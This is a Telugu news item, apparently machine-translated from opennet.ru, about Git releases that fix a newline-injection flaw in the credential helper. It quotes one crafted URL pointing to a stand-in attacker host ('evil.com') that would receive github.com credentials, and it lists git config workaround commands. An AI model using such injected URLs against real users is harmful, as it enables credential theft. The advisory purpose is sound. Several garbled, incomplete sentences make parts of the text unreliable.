పంపిణీ చేయబడిన మూల నియంత్రణ వ్యవస్థ యొక్క దిద్దుబాటు విడుదలలు Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 మరియు 2.17.4, లో ఇది తొలగించబడింది () హ్యాండ్లర్లో "", ఇది కొత్త లైన్ అక్షరాన్ని కలిగి ఉన్న ప్రత్యేకంగా ఫార్మాట్ చేయబడిన URLని ఉపయోగించి ఒక git క్లయింట్ రిపోజిటరీని యాక్సెస్ చేసినప్పుడు తప్పు హోస్ట్కు ఆధారాలు పంపబడతాయి. దాడి చేసేవారిచే నియంత్రించబడే సర్వర్కి పంపబడే మరొక హోస్ట్ నుండి ఆధారాలను ఏర్పాటు చేయడానికి దుర్బలత్వాన్ని ఉపయోగించవచ్చు.
“https://evil.com?%0ahost=github.com/” వంటి URLని పేర్కొన్నప్పుడు, హోస్ట్ evil.comకి కనెక్ట్ చేస్తున్నప్పుడు క్రెడెన్షియల్ హ్యాండ్లర్ github.com కోసం పేర్కొన్న ప్రమాణీకరణ పారామితులను పాస్ చేస్తుంది. సబ్మాడ్యూల్ల కోసం URLలను ప్రాసెస్ చేయడంతో సహా "git clone" వంటి కార్యకలాపాలను నిర్వహిస్తున్నప్పుడు సమస్య ఏర్పడుతుంది (ఉదాహరణకు, "git submodule update" రిపోజిటరీ నుండి .gitmodules ఫైల్లో పేర్కొన్న URLలను స్వయంచాలకంగా ప్రాసెస్ చేస్తుంది). డెవలపర్ URLని చూడకుండా రిపోజిటరీని క్లోన్ చేసే సందర్భాల్లో, ఉదాహరణకు, సబ్మాడ్యూల్స్తో పని చేస్తున్నప్పుడు లేదా ఆటోమేటిక్ చర్యలను చేసే సిస్టమ్లలో, ఉదాహరణకు, ప్యాకేజీ బిల్డ్ స్క్రిప్ట్లలో దుర్బలత్వం అత్యంత ప్రమాదకరం.
కొత్త సంస్కరణల్లో దుర్బలత్వాలను నిరోధించడానికి క్రెడెన్షియల్ ఎక్స్ఛేంజ్ ప్రోటోకాల్ ద్వారా ప్రసారం చేయబడిన ఏదైనా విలువలలో కొత్త లైన్ అక్షరాన్ని పాస్ చేయడం. పంపిణీల కోసం, మీరు పేజీలలో ప్యాకేజీ నవీకరణల విడుదలను ట్రాక్ చేయవచ్చు , , , , , , .
సమస్యను నిరోధించడానికి ప్రత్యామ్నాయంగా పబ్లిక్ రిపోజిటరీలను యాక్సెస్ చేస్తున్నప్పుడు credential.helperని ఉపయోగించవద్దు మరియు ఎంపిక చేయని రిపోజిటరీలతో "--recurse-submodules" మోడ్లో "git clone"ని ఉపయోగించవద్దు. credential.helper హ్యాండ్లర్ను పూర్తిగా నిలిపివేయడానికి, ఇది చేస్తుంది మరియు పాస్వర్డ్లను తిరిగి పొందడం , రక్షించబడింది లేదా పాస్వర్డ్లతో కూడిన ఫైల్, మీరు ఆదేశాలను ఉపయోగించవచ్చు:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
మూలం: opennet.ru